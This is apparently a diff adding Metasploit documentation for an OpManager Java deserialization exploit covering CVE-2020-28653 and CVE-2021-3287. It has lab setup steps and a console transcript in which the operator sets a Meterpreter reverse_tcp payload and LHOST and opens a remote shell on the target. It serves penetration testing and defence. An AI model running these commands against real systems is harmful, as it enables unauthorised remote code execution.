|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +### Description |
| 4 | + |
| 5 | +An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to deserialize an |
| 6 | +arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS commands in the context of |
| 7 | +the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This vulnerability is also present in other |
| 8 | +products that are built on top of the OpManager application. This vulnerability affects OpManager versions 12.1 - |
| 9 | +12.5.328. |
| 10 | + |
| 11 | +#### CVE-2020-28653 |
| 12 | +This vulnerability affects OpManager versions 12.1 - 12.5.232. The vulnerability involves sending a malicious PDU to the |
| 13 | +SmartUpdateManager handler that when deserialized executes an arbitary OS command. |
| 14 | + |
| 15 | +#### CVE-2021-3287 |
| 16 | +This vulnerability is a patch bypass for CVE-2020-28653 and affects OpManager versions 12.5.233 - 12.5.328. When the |
| 17 | +original vulnerability was patched, it was done so using a new `ITOMObjectInputStream` deserializer class. This object |
| 18 | +has a flaw in its validation logic. The object works by requiring the caller to specify a list of one or more object |
| 19 | +classes that can be deserialized. If an instance is used to perform more than one `readObject` call however, only the |
| 20 | +first is protected because once a serialized object of an allowed type is read from the stream, the |
| 21 | +`ITOMObjectInputStream` instance remains in a sort of authenticated state where subsequent objects can be read of any |
| 22 | +type. |
| 23 | + |
| 24 | +The exploit technique for this CVE leverages this by first sending a legitimate, serialized SUMPDU to create an instance |
| 25 | +of the `SUMServerIOAndDataAnalyzer` object whose `process` method makes multiple `readObject` calls using the same |
| 26 | +instance for each. |
| 27 | + |
| 28 | +Unlike exploiting CVE-2020-28653, to exploit CVE-2021-3287 the target server must have the SUM server running. This is |
| 29 | +not the case for the standard installer, but is the case for "Central" variant. Without the SUM server running, the log |
| 30 | +handler is not initialized which causes the request handler to crash making the vulnerable code path inaccessible. |
| 31 | + |
| 32 | +### Setup (Windows) |
| 33 | + |
| 34 | +1. Download an affected version for either Windows or Linux from the [archive][0] |
| 35 | +1. Run the installer executable |
| 36 | +1. Accept the default values for all settings (skip registration), until the very end when prompted to start the |
| 37 | + application |
| 38 | +1. Unselect the option to start the application |
| 39 | + 1. If this option is missed, just navigate to the tray icon where it will say that it's starting and select the |
| 40 | + option to stop it |
| 41 | +1. Start a command prompt as an administrative user |
| 42 | +1. Navigate to `C:\Program Files\ManageEngine\OpManager\bin`, older versions use `C:\ManageEngine\OpManager\bin` |
| 43 | +1. Run `run.bat` |
| 44 | +1. View and accept the license terms |
| 45 | +1. Press `f` to run the product in Free mode |
| 46 | + |
| 47 | +OpManager should start successfully after a few minutes. At that point the service can be exploited. In this case the |
| 48 | +session will be opened in the context of the user that ran the service with `run.bat`. Once the server is restarted and |
| 49 | +OpManager starts automatically, the vulnerability can be exploited to open a session in the context of NT |
| 50 | +AUTHORITY\SYSTEM. |
| 51 | + |
| 52 | +### Setup (Linux) |
| 53 | + |
| 54 | +1. Download an affected version for either Windows or Linux from the [archive][0] |
| 55 | +1. Run the installer executable as root |
| 56 | +1. Accept the default values for all settings (skip registration) |
| 57 | +1. Navigate to `/opt/ManageEngine/OpManagerCentral/bin`, older versions use `/opt/ManageEngine/OpManager/bin` |
| 58 | +1. Run `run.sh` as root |
| 59 | + |
| 60 | +## Verification Steps |
| 61 | + |
| 62 | +1. Install the application |
| 63 | +1. Start msfconsole |
| 64 | +1. Do: `use exploit/multi/http/opmanager_sumpdu_deserialization` |
| 65 | +1. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload-related options as necessary |
| 66 | +1. Do: `run` |
| 67 | +1. You should get a shell. |
| 68 | + |
| 69 | +## Options |
| 70 | + |
| 71 | +### CVE |
| 72 | +Vulnerability to use. If set to 'Automatic' (the default), the module will attempt to detect the version and select the |
| 73 | +correct vulnerability. |
| 74 | + |
| 75 | +## Scenarios |
| 76 | + |
| 77 | +### Windows Server 2019 x64 w/ ManageEngine OpManager v12.5.328 |
| 78 | + |
| 79 | +``` |
| 80 | +msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization |
| 81 | +[*] Using configured payload windows/x64/meterpreter/reverse_tcp |
| 82 | +msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set RHOSTS 192.168.159.96 |
| 83 | +RHOSTS => 192.168.159.96 |
| 84 | +msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set TARGET Windows\ PowerShell |
| 85 | +TARGET => Windows PowerShell |
| 86 | +msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set PAYLOAD windows/x64/meterpreter/reverse_tcp |
| 87 | +PAYLOAD => windows/x64/meterpreter/reverse_tcp |
| 88 | +msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set LHOST 192.168.159.128 |
| 89 | +LHOST => 192.168.159.128 |
| 90 | +msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check |
| 91 | +[*] 192.168.159.96:8060 - The target appears to be vulnerable. |
| 92 | +msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > exploit |
| 93 | +
|
| 94 | +[*] Started reverse TCP handler on 192.168.159.128:4444 |
| 95 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 96 | +[+] The target appears to be vulnerable. |
| 97 | +[*] An HTTP session cookie has been issued |
| 98 | +[*] Detected version: 12.5.328 |
| 99 | +[*] The request handler has been associated with the HTTP session |
| 100 | +[*] Sending stage (200262 bytes) to 192.168.159.96 |
| 101 | +[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.96:63887) at 2021-09-16 14:06:27 -0400 |
| 102 | +
|
| 103 | +meterpreter > getuid |
| 104 | +Server username: MSFLAB\smcintyre |
| 105 | +meterpreter > sysinfo |
| 106 | +Computer : WIN-3MSP8K2LCGC |
| 107 | +OS : Windows 2016+ (10.0 Build 17763). |
| 108 | +Architecture : x64 |
| 109 | +System Language : en_US |
| 110 | +Domain : MSFLAB |
| 111 | +Logged On Users : 9 |
| 112 | +Meterpreter : x64/windows |
| 113 | +meterpreter > |
| 114 | +``` |
| 115 | + |
| 116 | +[0]: https://archives.manageengine.com/opmanager/ |
0 commit comments